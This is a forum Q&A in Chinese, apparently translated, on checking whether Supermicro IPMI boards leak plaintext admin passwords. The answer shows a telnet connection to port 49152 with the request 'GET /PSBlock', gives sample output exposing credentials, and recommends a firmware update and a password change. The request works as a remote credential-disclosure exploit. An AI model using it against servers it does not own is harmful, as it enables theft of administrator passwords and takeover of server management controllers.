我有一些运行 IPMI 的 Supermicro 服务器,正如本博客所述(http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras)存在一个严重的漏洞,可以从任何远程位置获取明文管理员密码。
如何检查我的服务器主板是否受到了威胁?
答案1
只需通过 telnet 连接到端口 49152 中的 IPMI IP 地址并执行特定的 GET 请求即可。如果您受到攻击,您应该会获取您的用户和密码。
telnet server.example.com 49152
连接请求GET /PSBlock并观察结果后,它应该是这样的:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
回答:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
要解决此问题,请将 IPMI 固件更新至最新版本。该固件特定于您的 IPMI 控制器,因此您应该在 Supermicro 网站上获取指定版本。
然后更新固件更改你的密码。